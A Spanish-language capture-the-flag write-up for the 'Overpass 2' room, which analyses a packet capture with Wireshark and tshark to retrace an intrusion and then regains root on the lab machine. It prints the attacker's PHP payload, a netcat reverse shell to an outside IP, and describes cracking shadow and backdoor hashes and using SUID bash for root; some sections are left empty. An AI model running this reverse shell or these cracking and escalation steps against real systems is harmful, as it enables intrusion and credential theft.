🧑‍🔬OVERPASS 2 - HACKEADO

1. Análisis forense:

  • Se abre Wireshark y se carga el archivo de captura (overpass2.pcapng).

  • Se filtran los paquetes por protocolo HTTP.

  • Se busca la ruta "/development/upload.php".

  • Se analiza la carga útil del archivo payload.php para ver cómo se ejecutó el comando del shell inverso.

  • Tambien filtarmos con busqueda de filtros con TSHARK:

tshark -r overpass2.pcapng -x | strings | grep -A 5 ".php"
tshark -r overpass2.pcapng -T fields -e data | xxd -r -p | strings

Carga útil del archivo payload.php:

PHP

<?php
exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.170.145 4242 >/tmp/f");
?>

2. Escalada de privilegios:

  • Se busca en la captura de Wireshark el comando "sudo".

  • Se observa la contraseña "siemprequenoteartinstant" utilizada por el atacante para ejecutar el comando con privilegios de superusuario.

su james

3. Persistencia:

4. Obtención de acceso:

  • Se descifran 4 contraseñas de 5 usarios que el atacante vio en /etc/shadow , y usamos John the Ripper y una lista de palabras.

  • Se descifra el hash de la puerta trasera SSH utilizando hashcat, pero primero guardamos el Hash que uso el atacante al ejecutar ssh Backdoor mas el salt que contiene el script este, en el archivo se gurada asi: hash:salt.

  • Se utiliza ssh para conectarse al sistema con la cuenta de "James" y la contraseña "november16".

Comando para descifrar el hash de la puerta trasera SSH:

5. Elevación de privilegios:

  • Se ejecuta el archivo ".suid_bash" con la bandera "-p" para obtener privilegios de root, este parametro lo encontramos en las opciones del script suid_bash poniendo un -j o -h erroneo nos dio las opciones de parametro que tenia, y el -p decia que dejaba acceder al script con bit suid de ROOt a todas las rutas del $PATH por ende podriamos ejcutar ya asi cualquier comando como ROOT y se tenzo.

Comando para obtener privilegios de root:

Resultado:

  • Se recupera el control del sistema y se obtiene la bandera del usuario y ROOT.

Last updated